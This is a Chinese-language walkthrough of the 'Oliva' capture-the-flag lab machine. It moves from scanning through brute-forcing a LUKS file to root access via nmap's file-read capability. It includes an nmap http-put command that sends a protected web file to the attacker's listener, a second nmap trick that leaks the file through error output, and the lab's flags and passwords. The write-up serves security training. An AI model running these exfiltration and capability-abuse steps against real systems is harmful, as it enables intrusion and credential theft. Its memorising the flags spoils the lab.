Oliva
Oliva
信息搜集
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
rustscan -a 192.168.0.104 -- -A
Open 192.168.0.104:80
Open 192.168.0.104:22
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 6d:84:71:14:03:7d:7e:c8:6f:dd:24:92:a8:8e:f7:e9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKq/kHQkF02bmDYzOAD/qpiCHDR97iXI1oNT4/xeNcpIBmtOTI1NEY8dzAmGqpviQswx99Xc1WUXCJG5NUgf8bE=
| 256 d8:5e:39:87:9e:a1:a6:75:9a:28:78:ce:84:f7:05:7a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDERBi20HARO1lSqDbLVqQPspJ1HJA1KDXGblcp9T/cN
80/tcp open http syn-ack nginx 1.22.1
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
目录扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali💀kali)-[~/temp/Oliva]
└─$ gobuster dir -u http://192.168.0.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.0.104/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,zip,git,jpg,txt,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 69]
Progress: 1543920 / 1543927 (100.00%)
===============================================================
Finished
===============================================================
漏洞发现
踩点
敏感目录
http://192.168.0.104/index.php
1
Hi oliva, Here the pass to obtain root: CLICK!
下载一下他给的文件:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali💀kali)-[~/temp/Oliva]
└─$ wget http://192.168.0.104/oliva
--2024-04-21 03:43:52-- http://192.168.0.104/oliva
Connecting to 192.168.0.104:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20000000 (19M) [application/octet-stream]
Saving to: ‘oliva’
oliva 100%[=========================================================================>] 19.07M --.-KB/s in 0.07s
2024-04-21 03:43:52 (257 MB/s) - ‘oliva’ saved [20000000/20000000]
┌──(kali💀kali)-[~/temp/Oliva]
└─$ ls -la
total 19540
drwxr-xr-x 2 kali kali 4096 Apr 21 03:43 .
drwxr-xr-x 56 kali kali 4096 Apr 21 03:39 ..
-rw-r--r-- 1 kali kali 20000000 Jul 4 2023 oliva
┌──(kali💀kali)-[~/temp/Oliva]
└─$ file oliva
oliva: LUKS encrypted file, ver 2, header size 16384, ID 3, algo sha256, salt 0x14fa423af24634e8..., UUID: 9a391896-2dd5-4f2c-84cf-1ba6e4e0577e, crc 0x6118d2d9b595355f..., at 0x1000 {"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offse
查一下这是个啥:
LUKS (Linux Unified Key Setup) 是一种用于Linux和其他类Unix操作系统中的全盘加密标准。它为存储设备(如硬盘分区、固态硬盘或USB驱动器)提供了透明的、基于密码的加密机制。
- 初始化加密分区:
cryptsetup luksFormat /dev/device --cipher aes-xts-plain64 --key-size 512 --hash sha512 --iter-time 5000
- 打开(即挂载)加密分区:
cryptsetup open /dev/device myencryptedvolume
- 在打开的加密设备上创建并格式化文件系统:
mkfs.ext4 /dev/mapper/myencryptedvolume
- 挂载文件系统供正常使用:
mount /dev/mapper/myencryptedvolume /mnt/secure
- 关闭(即卸载)加密分区:
cryptsetup close myencryptedvolume
爆破LUKS
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali💀kali)-[~/temp/Oliva]
└─$ chmod +x oliva
┌──(kali💀kali)-[~/temp/Oliva]
└─$ bruteforce-luks -t 4 -f /usr/share/wordlists/rockyou.txt -v 10 oliva
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.
Tried passwords: 0
Tried passwords per second: 0.000000
Last tried password: password
^C
啊这。。。。
我直接看别人的wp了,这个可能是我这边的环境配置有点问题:
1
Password found: bebita
然后打开文件:
1
2
3
4
5
6
7
8
cryptsetup luksOpen oliva temp
bebita
cd /dev/mapper/
ls -la
mount /dev/mapper/temp /mnt
cd /mnt
cat mypass.txt
# Yesthatsmypass!
ssh连接
提权
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
oliva@oliva:~$ ls -la
total 32
drwx------ 3 oliva oliva 4096 jul 4 2023 .
drwxr-xr-x 3 root root 4096 jul 4 2023 ..
lrwxrwxrwx 1 oliva oliva 9 jul 4 2023 .bash_history -> /dev/null
-rw-r--r-- 1 oliva oliva 220 jul 4 2023 .bash_logout
-rw-r--r-- 1 oliva oliva 3526 jul 4 2023 .bashrc
drwxr-xr-x 3 oliva oliva 4096 jul 4 2023 .local
-rw-r--r-- 1 oliva oliva 807 jul 4 2023 .profile
-rw------- 1 oliva oliva 24 jul 4 2023 user.txt
-rw------- 1 oliva oliva 102 jul 4 2023 .Xauthority
oliva@oliva:~$ cat user.txt
HMVY0H8NgGJqbFzbgo0VMRm
oliva@oliva:~$ sudo -l
-bash: sudo: orden no encontrada
oliva@oliva:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
oliva@oliva:~$ /usr/sbin/getcap / 2>/dev/null
oliva@oliva:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/nmap cap_dac_read_search=eip
/usr/bin/ping cap_net_raw=ep
nmap读取数据库密码
nmap阔以读取文件。
参考一下:https://gtfobins.github.io/gtfobins/nmap/#file-upload
继续查看一下是否开启了相关服务:
1
2
3
4
5
6
7
8
oliva@oliva:~$ ss -tnlup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 [::]:80 [::]:*
tcp LISTEN 0 128 [::]:22 [::]:*
开启了数据库。
使用gtfobins
的方案:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(kali💀kali)-[~]
└─$ socat -v tcp-listen:8080,reuseaddr,fork -
2024/04/21 05:12:51 socat[19458] E read(6, 0x55c8d32e0000, 8192): Connection reset by peer
> 2024/04/21 05:12:51.000584590 length=331 from=0 to=330
PUT / HTTP/1.1\r
Content-Length: 163\r
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)\r
Connection: close\r
Host: kali:8080\r
\r
Hi oliva,
Here the pass to obtain root:
<?php
$dbname = 'easy';
$dbuser = 'root';
$dbpass = 'Savingmypass';
$dbhost = 'localhost';
?>
<a href="oliva">CLICK!</a>
PUT / HTTP/1.1
Content-Length: 163
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
Host: kali:8080
Hi oliva,
Here the pass to obtain root:
<?php
$dbname = 'easy';
$dbuser = 'root';
$dbpass = 'Savingmypass';
$dbhost = 'localhost';
?>
<a href="oliva">CLICK!</a>
^C
1
2
3
4
5
6
7
8
9
10
oliva@oliva:~$ nmap -p 8080 192.168.0.143 --script http-put --script-args http-put.url=/,http-put.file=/var/www/html/index.php
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-21 11:12 CEST
Nmap scan report for kali (192.168.0.143)
Host is up (0.00091s latency).
PORT STATE SERVICE
8080/tcp open http-proxy
|_http-put: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 4.41 seconds
或者使用以下方案:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
oliva@oliva:~$ cd /var/www/html
oliva@oliva:/var/www/html$ ls -la
total 19548
drwxr-xr-x 2 root root 4096 jul 4 2023 .
drwxr-xr-x 3 root root 4096 jul 4 2023 ..
-rw-rw---- 1 www-data www-data 615 jul 4 2023 index.html
-rw-rw---- 1 www-data www-data 163 jul 4 2023 index.php
-rw-rw---- 1 www-data www-data 20000000 jul 4 2023 oliva
oliva@oliva:/var/www/html$ cat index.php
cat: index.php: Permiso denegado
oliva@oliva:/var/www/html$ nmap -iL index.php
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-21 11:07 CEST
Failed to resolve "Hi".
Failed to resolve "oliva,".
Failed to resolve "Here".
Failed to resolve "the".
Failed to resolve "pass".
Failed to resolve "to".
Failed to resolve "obtain".
Failed to resolve "root:".
Failed to resolve "<?php".
Failed to resolve "$dbname".
Failed to resolve "=".
Failed to resolve "'easy';".
Failed to resolve "$dbuser".
Failed to resolve "=".
Failed to resolve "'root';".
Failed to resolve "$dbpass".
Failed to resolve "=".
Failed to resolve "'Savingmypass';".
Failed to resolve "$dbhost".
Failed to resolve "=".
Failed to resolve "'localhost';".
Failed to resolve "?>".
Failed to resolve "<a".
Unable to split netmask from target expression: "href="oliva">CLICK!</a>"
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.68 seconds
找到了数据库密码!
root
Savingmypass
读取数据库提权
然后读取数据库:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
oliva@oliva:~$ mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 5
Server version: 10.11.3-MariaDB-1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| easy |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0,067 sec)
MariaDB [(none)]> use easy;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [easy]> show tables;
+----------------+
| Tables_in_easy |
+----------------+
| logging |
+----------------+
1 row in set (0,000 sec)
MariaDB [easy]> select * from logging;
+--------+------+--------------+
| id_log | uzer | pazz |
+--------+------+--------------+
| 1 | root | OhItwasEasy! |
+--------+------+--------------+
1 row in set (0,026 sec)
MariaDB [easy]> exit
Bye
尝试登录,发现成功!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
oliva@oliva:~$ su root
Contraseña:
root@oliva:/home/oliva# cd /root
root@oliva:~# ls -la
total 32
drwx------ 4 root root 4096 jul 4 2023 .
drwxr-xr-x 18 root root 4096 jul 4 2023 ..
lrwxrwxrwx 1 root root 9 jul 4 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 abr 10 2021 .bashrc
drwxr-xr-x 3 root root 4096 jul 4 2023 .local
-rw------- 1 root root 567 jul 4 2023 .mysql_history
-rw-r--r-- 1 root root 161 jul 9 2019 .profile
-rw------- 1 root root 24 jul 4 2023 rutflag.txt
drwx------ 2 root root 4096 jul 4 2023 .ssh
root@oliva:~# cat rutflag.txt
HMVnuTkm4MwFQNPmMJHRyW7
root@oliva:~# cd .ssh/
root@oliva:~/.ssh# ls -la
total 8
drwx------ 2 root root 4096 jul 4 2023 .
drwx------ 4 root root 4096 jul 4 2023 ..
本文由作者按照 CC BY 4.0 进行授权